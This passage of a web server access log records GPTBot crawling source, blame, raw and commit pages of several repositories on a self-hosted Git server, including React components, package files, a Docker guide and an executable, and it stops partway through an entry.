"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/dist" -[17/Feb/2026:13:48:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 11682] [Gzip 4.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:13:48:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 806] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:13:48:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 9889] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Footer.tsx" -[17/Feb/2026:13:48:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/DOCKER_GUIDE.md" [Client 74.7.227.38] [Length 23713] [Gzip 15.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/DOCKER_GUIDE.md" -[17/Feb/2026:13:48:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/DOCKER_GUIDE.md" [Client 74.7.227.38] [Length 23747] [Gzip 15.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/DOCKER_GUIDE.md" -[17/Feb/2026:13:48:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Header.tsx" -[17/Feb/2026:13:48:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Footer.tsx" -[17/Feb/2026:13:48:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16513] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components" -[17/Feb/2026:13:48:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15586] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components" -[17/Feb/2026:13:48:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 13815] [Gzip 6.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/About.tsx" -[17/Feb/2026:13:48:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/dist/PostgresWatchdog.exe" -[17/Feb/2026:13:48:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 9511] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/dist/PostgresWatchdog.exe" -[17/Feb/2026:13:48:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 8940517] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/dist/PostgresWatchdog.exe" -[17/Feb/2026:13:48:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/About.tsx" -[17/Feb/2026:13:48:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot" [Client 74.7.227.38] [Length 14724] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/explore/repos" -[17/Feb/2026:13:48:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt-requests_error.log" -[17/Feb/2026:13:48:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 12178] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs" -[17/Feb/2026:13:48:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/package.json" [Client 74.7.227.38] [Length 11701] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html" -[17/Feb/2026:13:48:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16944] [Gzip 8.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Contact.tsx" -[17/Feb/2026:13:48:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15935] [Gzip 7.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:13:48:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 9890] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Contact.tsx" -[17/Feb/2026:13:48:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 9890] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:13:48:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:13:48:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Contact.tsx" -[17/Feb/2026:13:48:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/package.json" [Client 74.7.227.38] [Length 11701] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html" -[17/Feb/2026:13:48:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/package.json" [Client 74.7.227.38] [Length 11701] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html" -[17/Feb/2026:13:48:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14231] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components" -[17/Feb/2026:13:48:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 5722] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt-requests_access.log" -[17/Feb/2026:13:48:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/package.json" [Client 74.7.227.38] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/package.json" -[17/Feb/2026:13:48:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15578] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components" -[17/Feb/2026:13:48:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13683] [Gzip 5.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Hero.tsx" -[17/Feb/2026:13:48:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14231] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components" -[17/Feb/2026:13:48:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13684] [Gzip 5.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Hero.tsx" -[17/Feb/2026:13:48:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 13960] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components" -[17/Feb/2026:13:48:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16505] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components" -[17/Feb/2026:13:48:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/package.json" [Client 74.7.227.38] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/package.json" -[17/Feb/2026:13:48:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/package.json" [Client 74.7.227.38] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/package.json" -[17/Feb/2026:13:48:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Footer.tsx" -[17/Feb/2026:13:48:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 14843] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components" -[17/Feb/2026:13:48:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16504] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components" -[17/Feb/2026:13:48:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:13:48:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13682] [Gzip 5.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Hero.tsx" -[17/Feb/2026:13:48:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Footer.tsx" -[17/Feb/2026:13:48:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16506] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components" -[17/Feb/2026:13:48:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/About.tsx?display=source" [Client 74.7.227.38] [Length 13975] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/About.tsx" -[17/Feb/2026:13:48:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 13812] [Gzip 6.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/About.tsx" -[17/Feb/2026:13:48:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Contact.tsx" -[17/Feb/2026:13:48:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 13957] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components" -[17/Feb/2026:13:48:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 14843] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components" -[17/Feb/2026:13:48:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Header.tsx" -[17/Feb/2026:13:48:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/About.tsx" -[17/Feb/2026:13:48:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Contact.tsx" -[17/Feb/2026:13:48:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15579] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components" -[17/Feb/2026:13:48:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr 